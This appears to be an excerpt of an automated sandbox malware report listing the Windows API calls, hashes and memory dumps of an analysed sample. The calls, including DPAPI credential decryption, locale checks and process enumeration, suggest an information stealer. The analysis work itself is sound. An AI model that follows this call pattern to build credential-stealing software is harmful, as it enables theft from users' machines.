                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                  • String ID:
                                  • API String ID: 2567437900-0
                                  • Opcode ID: 932486d7a2026c1b6a6a3f93530c054eaa4315a1fc33dfaa478286ec9c566091
                                  • Instruction ID: c600432f9d67e455f7ff5ed3cedd208813333e2329dafbaccd4e4c3a8003dee8
                                  • Opcode Fuzzy Hash: 932486d7a2026c1b6a6a3f93530c054eaa4315a1fc33dfaa478286ec9c566091
                                  • Instruction Fuzzy Hash: 4331AD316221169BCB27EF68EC99EDF73B9AF54300F014124F8469B291CF70EC298B90
                                  APIs
                                    • Part of subcall function 003271E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 003271FE
                                  • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00322D9B
                                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 00322DAD
                                  • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00322DBA
                                  • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00322DEC
                                  • LocalFree.KERNEL32(00000000), ref: 00322FCA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                   • Associated: same set of associated memory dumps as listed above (identical list)
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                  • String ID: /
                                  • API String ID: 3090951853-4001269591
                                  • Opcode ID: 62fac38b825cdbab39b9e3e0a22b804e02dc3de45863ab0143186833a88a60f7
                                  • Instruction ID: 5f02fa4932a5ac630e32717dd0b3330e7d7de8ca1bb6adce3002a24af5cc95cb
                                  • Opcode Fuzzy Hash: 62fac38b825cdbab39b9e3e0a22b804e02dc3de45863ab0143186833a88a60f7
                                  • Instruction Fuzzy Hash: E3B1F971900224DFC716CF14E948B96B7F1BB44324F2AC1A9D409AB3A2D7769D86DF90
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                   • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: !b~$&0?$4An/$E>u$cD~~$fA3/$";f
                                  • API String ID: 0-1556407514
                                  • Opcode ID: 2d0cc503afe11245697e18d2cc95991834ee1d442f384d959bb81200da137a65
                                  • Instruction ID: 6ac3fc0dd16db03704e82d48ee5eb3612b559ca80fa34c64186b83385141f911
                                  • Opcode Fuzzy Hash: 2d0cc503afe11245697e18d2cc95991834ee1d442f384d959bb81200da137a65
                                  • Instruction Fuzzy Hash: 89B238F3A0C2149FE3046E2DEC4567AFBE9EF94720F1A853DE6C4C3744EA3598058696
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                   • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: :=?$C$~$g*=$uE{[$uaix$v,^$7~s
                                  • API String ID: 0-3688915194
                                  • Opcode ID: e6b72eb26d35bb880bcd7c2a7df1dc827701895c36338a183bb8250ff18f4676
                                  • Instruction ID: 170fe7ee694e54bde621ddc17abe2b98ec1b861c076415609074cc40ca4a63f2
                                  • Opcode Fuzzy Hash: e6b72eb26d35bb880bcd7c2a7df1dc827701895c36338a183bb8250ff18f4676
                                  • Instruction Fuzzy Hash: ECB23AF360C2049FE304AE2DEC8577AB7E9EBD4320F16863DE6C5C3744EA3599058696
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                   • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: X:y$X:y$lI^~$rgC$xVho$|/kw$k
                                  • API String ID: 0-2569428395
                                  • Opcode ID: f8ee84ed3d6c6d79b80db89ae97366bf64b174def9a88397af7f63eb3c99dd6e
                                  • Instruction ID: d7202a08a428a379afd6a1f82ac7140e5644ed37f0640eb930f26302c09112d6
                                  • Opcode Fuzzy Hash: f8ee84ed3d6c6d79b80db89ae97366bf64b174def9a88397af7f63eb3c99dd6e
                                  • Instruction Fuzzy Hash: B4B2F5F3A0C210AFE304AE6DEC8567ABBE9EF94320F16493DE6C4C3744E67558018796
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00322C42
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00322C49
                                  • GetTimeZoneInformation.KERNEL32(?), ref: 00322C58
                                  • wsprintfA.USER32 ref: 00322C83
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                   • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                  • String ID: wwww
                                  • API String ID: 3317088062-671953474
                                  • Opcode ID: 53a0fbac2aad63ff9462a1332e213cf31128938e88eb1f4fbb0251e33b5001c7
                                  • Instruction ID: 24342ec4847d69925c0091aff4aeb657c0460ef7a059e4bc691f2eeaa4fa1092
                                  • Opcode Fuzzy Hash: 53a0fbac2aad63ff9462a1332e213cf31128938e88eb1f4fbb0251e33b5001c7
                                  • Instruction Fuzzy Hash: 96012BB1A04614ABC71D8F58DC4EFAEB76DEB84721F004329F916D73C0D7B419048AD1
                                  APIs
                                  • GetSystemTime.KERNEL32(?), ref: 00321B72
                                    • Part of subcall function 00321820: lstrcpy.KERNEL32(00000000,0032CFEC), ref: 0032184F
                                    • Part of subcall function 00321820: lstrlen.KERNEL32(01016108), ref: 00321860
                                    • Part of subcall function 00321820: lstrcpy.KERNEL32(00000000,00000000), ref: 00321887
                                    • Part of subcall function 00321820: lstrcat.KERNEL32(00000000,00000000), ref: 00321892
                                    • Part of subcall function 00321820: lstrcpy.KERNEL32(00000000,00000000), ref: 003218C1
                                    • Part of subcall function 00321820: lstrlen.KERNEL32(00334FA0), ref: 003218D3
                                    • Part of subcall function 00321820: lstrcpy.KERNEL32(00000000,00000000), ref: 003218F4
                                    • Part of subcall function 00321820: lstrcat.KERNEL32(00000000,00334FA0), ref: 00321900
                                    • Part of subcall function 00321820: lstrcpy.KERNEL32(00000000,00000000), ref: 0032192F
                                  • sscanf.NTDLL ref: 00321B9A
                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00321BB6
                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00321BC6
                                  • ExitProcess.KERNEL32 ref: 00321BE3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                   • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Timelstrcpy$System$Filelstrcatlstrlen$ExitProcesssscanf
                                  • String ID:
                                  • API String ID: 3040284667-0
                                  • Opcode ID: 672f8f785a20acb613d34028727f053e0b573fd319e2a79a8435a758dfc30681
                                  • Instruction ID: 4f1dfee85151c0744542f72d4de2acd3d6fe8df6ae6c0a39aa73316bf537387c
                                  • Opcode Fuzzy Hash: 672f8f785a20acb613d34028727f053e0b573fd319e2a79a8435a758dfc30681
                                  • Instruction Fuzzy Hash: 3221F3B5518301AF8354DF69D88585FBBF8FFE8214F409A1EF599C3220E770D5088BA2
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0030775E
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00307765
                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 0030778D
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 003077AD
                                  • LocalFree.KERNEL32(?), ref: 003077B7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                   • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                  • String ID:
                                  • API String ID: 2609814428-0
                                  • Opcode ID: 66bed1059188f3936d6c1ca9a7bcf0f18e7ab709a9ffa67d10ab8968d73a2221
                                  • Instruction ID: bea81bb67a106b0434550624b922a8b1d61f12ce0bcfb518266f0b8785aa9090
                                  • Opcode Fuzzy Hash: 66bed1059188f3936d6c1ca9a7bcf0f18e7ab709a9ffa67d10ab8968d73a2221
                                  • Instruction Fuzzy Hash: EA011EB5B44318BBEB14DB949C4AFAA7B78EB44B11F104155FA09EA3C0D6B0A904CB90
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                   • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: ZD$r]f_$uO${I=v
                                  • API String ID: 0-2912207845
                                  • Opcode ID: addd2528f0cd6280123be8f736571e9b697cd323bc0780aa0f61f89a8cda4026
                                  • Instruction ID: bb04fb5a2f0bd05ab2d3831216764cdfa00647447e3d2cbbd294637131524d57
                                  • Opcode Fuzzy Hash: addd2528f0cd6280123be8f736571e9b697cd323bc0780aa0f61f89a8cda4026
                                  • Instruction Fuzzy Hash: 02B229B36082009FE304AE2DEC8567ABBE6EFD4720F1A893DE5C4C7744EA3558458797
                                  APIs
                                    • Part of subcall function 003271E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 003271FE
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00323A96
                                  • Process32First.KERNEL32(00000000,00000128), ref: 00323AA9
                                  • Process32Next.KERNEL32(00000000,00000128), ref: 00323ABF
                                    • Part of subcall function 00327310: lstrlen.KERNEL32(------,00305BEB), ref: 0032731B
                                    • Part of subcall function 00327310: lstrcpy.KERNEL32(00000000), ref: 0032733F
                                    • Part of subcall function 00327310: lstrcat.KERNEL32(?,------), ref: 00327349
                                    • Part of subcall function 00327280: lstrcpy.KERNEL32(00000000), ref: 003272AE
                                  • CloseHandle.KERNEL32(00000000), ref: 00323BF7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                   • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                  • String ID:
                                  • API String ID: 1066202413-0
                                  • Opcode ID: 69e8c3b6694a9279934646b44e21e127e40e4bacd2511bcdfb1a78ffa9534430
                                  • Instruction ID: bb242ee6e33da63eddef4bcab73970ed570cbe6894068bf436a9f1c1054cbb36
                                  • Opcode Fuzzy Hash: 69e8c3b6694a9279934646b44e21e127e40e4bacd2511bcdfb1a78ffa9534430
                                  • Instruction Fuzzy Hash: 3B81F770905224CFC716CF18E988B95B7F1FB44315F2AC1A9D409AB3A2D77A9D86DF80
                                  APIs
                                  • lstrlen.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 0030EA76
                                  • CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 0030EA7E
                                  • lstrcat.KERNEL32(0032CFEC,0032CFEC), ref: 0030EB27
                                  • lstrcat.KERNEL32(0032CFEC,0032CFEC), ref: 0030EB49
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$BinaryCryptStringlstrlen
                                  • String ID:
                                  • API String ID: 189259977-0
                                  • Opcode ID: 37348523eb4365834da2c8be4bf70a5bf57849962e9e25ccb07c4946718a44ad
                                  • Instruction ID: b359381142f62e957d604d314c41b6329d96a7005793bc6e658c6d5d06543f57
                                  • Opcode Fuzzy Hash: 37348523eb4365834da2c8be4bf70a5bf57849962e9e25ccb07c4946718a44ad
                                  • Instruction Fuzzy Hash: B131E476B14219ABDB11CB98EC49FEEB77DDF44705F0041A5FA09E2280DBB05A08CBA1
                                  APIs
                                  • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,?), ref: 003240CD
                                  • GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 003240DC
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 003240E3
                                  • CryptBinaryToStringA.CRYPT32(?,?,40000001,?,?,?,?,?,?), ref: 00324113
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: BinaryCryptHeapString$AllocateProcess
                                  • String ID:
                                  • API String ID: 3825993179-0
                                  • Opcode ID: e337bb687666b56ebf2bfea6dc1528b9a8de99518ea02ebdbd2352621dba3cb9
                                  • Instruction ID: 4a18dabf81eaee91e9c8929f74b6bc826ed770915653d33533cabe4b547e6a41
                                  • Opcode Fuzzy Hash: e337bb687666b56ebf2bfea6dc1528b9a8de99518ea02ebdbd2352621dba3cb9
                                  • Instruction Fuzzy Hash: 59017CB0600215BBDB14CFA5EC89BAABBADEF94311F108059FE09C7340DA71D980DBA0
                                  APIs
                                  • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00309B3B
                                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 00309B4A
                                  • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00309B61
                                  • LocalFree.KERNEL32 ref: 00309B70
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: BinaryCryptLocalString$AllocFree
                                  • String ID:
                                  • API String ID: 4291131564-0
                                  • Opcode ID: c61ec63bdb5c7d5223737e730d2f99737acc406a3461561bcd7c7c1a2fb02237
                                  • Instruction ID: 3e399db7674c482023ebdbe15564cb98bfcca2aff13fae1f27273af501f9f575
                                  • Opcode Fuzzy Hash: c61ec63bdb5c7d5223737e730d2f99737acc406a3461561bcd7c7c1a2fb02237
                                  • Instruction Fuzzy Hash: 00F01DB03453126BE7311F65AC59F577BA8EF14B60F210115FA45EA3D0D7B09844CAA4
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: J|o$cLFm$p*'d
                                  • API String ID: 0-2978934763
                                  • Opcode ID: 401fee6e648d2d69052b180d3a8e4a516ab921ab679cd846720f9b921f16cddb
                                  • Instruction ID: 5520cbafd6d85ef8b860e8e3deb3330bc6ab2edd406dbeb538260d1ebf3937d1
                                  • Opcode Fuzzy Hash: 401fee6e648d2d69052b180d3a8e4a516ab921ab679cd846720f9b921f16cddb
                                  • Instruction Fuzzy Hash: 2DB2D4F350C6009FE308AF29EC8567ABBE5EF94720F16492DE6C5C3744E63598418B97
                                  APIs
                                  • CoCreateInstance.COMBASE(0032B110,00000000,00000001,0032B100,?), ref: 0031CB06
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 0031CB46
                                  • lstrcpyn.KERNEL32(?,?,00000104), ref: 0031CBC9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
